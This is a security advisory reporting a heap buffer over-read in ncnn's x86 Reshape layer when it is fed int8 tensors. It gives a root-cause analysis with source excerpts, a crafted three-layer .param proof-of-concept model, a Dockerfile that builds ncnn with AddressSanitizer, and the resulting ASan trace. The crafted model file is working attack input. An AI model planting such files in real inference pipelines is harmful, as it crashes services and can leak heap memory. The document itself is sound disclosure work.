Int8 Reshape Heap Buffer Over-Read
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/reshape_x86.cpp:681 in Reshape_x86::forward
Sanitizer verdict: unknown-crash
Summary
Reshape_x86::forward() dispatches to a specialised path only for 16-bit tensors; an 8-bit (int8) tensor falls through into the float implementation, which copies the blob with 32-byte AVX loads over a buffer that holds one byte per element. A model that puts a Quantize layer in front of a Reshape therefore makes ncnn read roughly four times the flattened tensor, running off the end of the heap allocation. The PoC drives this through ncnnoptimize, whose ModelWriter::shape_inference() executes the graph.
Detail
The blob's element size is attacker-chosen by graph construction: Quantize emits an int8 tensor (elemsize == 1), and the .param file routes it straight into Reshape. Reshape_x86::forward() only has a bail-out for 16-bit data:
// src/layer/x86/reshape_x86.cpp:42
int elembits = bottom_blob.elembits();
if (elembits == 16)
return forward_bf16s_fp16s(bottom_blobs, top_blobs, opt);
An elembits() == 8 blob passes this test and proceeds through the generic float body. That body flattens the input (flatten(bottom_blob, bottom_blob_flattened, opt_flatten) at line 432, which correctly preserves the 1-byte element size) and then copies it out with float pointers and SIMD loads whose trip count is the element count, not the byte count:
// src/layer/x86/reshape_x86.cpp:671
for (int q = 0; q < top_blob.c; q++)
{
const float* ptr = (const float*)bottom_blob_flattened + size * q;
float* outptr = top_blob.channel(q);
int i = 0;
#if __SSE2__
#if __AVX__
for (; i + 7 < size; i += 8)
{
__m256 _v = _mm256_loadu_ps(ptr);
_mm256_storeu_ps(outptr, _v);
ptr += 8;
outptr += 8;
}
The PoC's input blob is 100x1x4, so after Quantize the flattened tensor is 400 int8 elements. Mat::create gives it a 468-byte region (400 bytes of payload, 4-byte refcount, 64-byte NCNN_MALLOC_OVERREAD tail). Reshape reshape 1 1 quant_out output 0=50 1=4 2=2 asks for a 50x4x2 output, so size = outw * outh = 200 and top_blob.c = 2; the loop above reads 200 floats — 800 bytes — per channel from that 468-byte buffer. The 32-byte _mm256_loadu_ps issued at i = 112 starts at byte offset 448 and runs to 479, crossing the end of the region at 468, which is the partial-overlap unknown-crash AddressSanitizer reports.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-int8-reshape-heap-buffer-over-read && cd ncnn-poc-int8-reshape-heap-buffer-over-read
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_EOF'
7767517
3 3
Input data 0 1 data 0=100 1=1 2=4
Quantize quant 1 1 data quant_out 0=1
Reshape reshape 1 1 quant_out output 0=50 1=4 2=2
POC_EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
==1==ERROR: AddressSanitizer: unknown-crash on address 0x516000000540 at pc 0x5a705185f8e9 bp 0x7ffd10f328b0 sp 0x7ffd10f328a0
READ of size 32 at 0x516000000540 thread T0
#0 0x5a705185f8e8 in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
#1 0x5a705185f8e8 in ncnn::Reshape_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/reshape_x86_avx512.cpp:681
#2 0x5a7051803ac9 in ncnn::Reshape::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/reshape.cpp:81
#3 0x5a704df2af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#4 0x5a704df1cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#5 0x5a704df7c9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x5a704de0e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x5a704de8beee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x789c624d71c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x789c624d728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x5a704de0b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x516000000554 is located 0 bytes after 468-byte region [0x516000000380,0x516000000554)
allocated by thread T0 here:
#0 0x789c62b50f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5a704dea068e in fastMalloc /ncnn/src/allocator.h:62
#2 0x5a704dea068e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x5a704dede621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
#4 0x5a7050aa9f09 in ncnn::Flatten_x86_avx512::forward_int8(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/flatten_x86_avx512.cpp:920
#5 0x5a7050a87f91 in ncnn::Flatten_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/flatten_x86_avx512.cpp:34
#6 0x5a704deb2da8 in ncnn::Layer_final::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer.cpp:366
#7 0x5a704def4c22 in ncnn::flatten(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) /ncnn/src/mat.cpp:2304
#8 0x5a7051853bca in ncnn::Reshape_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/reshape_x86_avx512.cpp:432
#9 0x5a7051803ac9 in ncnn::Reshape::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/reshape.cpp:81
#10 0x5a704df2af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#11 0x5a704df1cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#12 0x5a704df7c9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#13 0x5a704de0e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#14 0x5a704de8beee in main /ncnn/tools/ncnnoptimize.cpp:2844
#15 0x789c624d71c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#16 0x789c624d728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#17 0x5a704de0b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)
Credit
Zheng Yu @ DepthFirst